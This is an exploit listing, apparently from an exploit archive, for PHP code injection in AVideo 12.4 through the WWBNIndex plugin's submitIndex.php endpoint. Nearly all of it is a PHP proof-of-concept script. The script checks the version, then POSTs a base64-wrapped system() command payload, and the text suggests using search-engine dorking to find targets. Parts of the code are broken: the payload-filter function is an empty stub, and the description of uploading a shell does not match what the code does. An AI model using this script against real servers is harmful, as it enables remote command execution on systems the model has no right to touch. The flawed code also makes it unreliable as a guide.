Share
## https://sploitus.com/exploit?id=PACKETSTORM:181979
=============================================================================================================================================  
| # Title : AVideo 12.4 php code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://github.com/WWBN/AVideo/tree/master |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] The following php code Upload shell file from external link.  
  
[+] Line 114 set your target.  
  
[+] Line 115 set your commands.  
  
[+] save code as poc.php .  
  
[+] USage : cmd = php poc.php .  
  
[+] PayLoad :  
  
<?php  
class indoushka  
{  
private $target_uri;  
private $payload;  
  
public function __construct($target_uri, $payload)  
{  
$this->target_uri = $target_uri;  
$this->payload = $payload;  
}  
  
public function exploit()  
{  
// إعداد الحمولة  
$php_code = "<?php " . ($this->isArchPHP() ? $this->payload : "system(base64_decode('" . base64_encode($this->payload) . "'));") . " ?>";  
$filter_payload = $this->generatePhpFilterPayload($php_code);  
  
// إرسال الطلب  
$data = http_build_query(['systemRootPath' => $filter_payload]);  
$response = $this->sendRequest('POST', '/plugin/WWBNIndex/submitIndex.php', $data);  
  
if ($response['code'] !== 200) {  
echo "Server returned " . $response['code'] . ". Successful exploit attempts should not return a response.\n";  
}  
}  
  
public function check()  
{  
$response = $this->sendRequest('GET', '/index.php');  
if (!$response) {  
return 'Failed to connect to the target.';  
}  
  
if ($response['code'] !== 200) {  
return "Unexpected HTTP response code: " . $response['code'];  
}  
  
preg_match('/Powered by AVideo ® Platform v([\d.]+)/', $response['body'], $version_match);  
preg_match('/<!--.*?v:([\d.]+).*?-->/m', $response['body'], $version_match);  
if (empty($version_match[1])) {  
return 'Unable to extract AVideo version.';  
}  
  
$version = $version_match[1];  
$plugin_check = $this->sendRequest('GET', '/plugin/WWBNIndex/submitIndex.php');  
if ($plugin_check['code'] !== 200) {  
return 'Vulnerable plugin WWBNIndex was not detected';  
}  
  
if (version_compare($version, '12.4') >= 0 && version_compare($version, '14.2') <= 0) {  
return "Detected vulnerable AVideo version: {$version}, with vulnerable plugin WWBNIndex running.";  
}  
  
return "Detected non-vulnerable AVideo version: {$version}";  
}  
  
private function sendRequest($method, $uri, $data = null)  
{  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_URL, $this->target_uri . $uri);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);  
  
if ($method === 'POST') {  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);  
}  
  
$response = curl_exec($ch);  
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);  
curl_close($ch);  
  
return ['code' => $http_code, 'body' => $response];  
}  
  
private function isArchPHP()  
{  
// افترض أن الحمولة عبارة عن كود PHP  
return true; // أو تحقق من ذلك بناءً على شروط معينة  
}  
  
private function generatePhpFilterPayload($php_code)  
{  
// يجب أن تضيف هنا منطق إعداد الحمولة (تصفية)  
return $php_code; // قم بتعديل ذلك بناءً على متطلباتك  
}  
}  
  
// مثال على كيفية الاستخدام:  
$target_uri = "http://target-url.com"; // أدخل عنوان الهدف هنا  
$payload = "<?php echo 'Hello World!'; ?>"; // الحمولة المراد استخدامها  
$indoushka = new indoushka($target_uri, $payload);  
$check_result = $indoushka->check();  
echo $check_result . "\n";  
$indoushka->exploit();  
?>  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================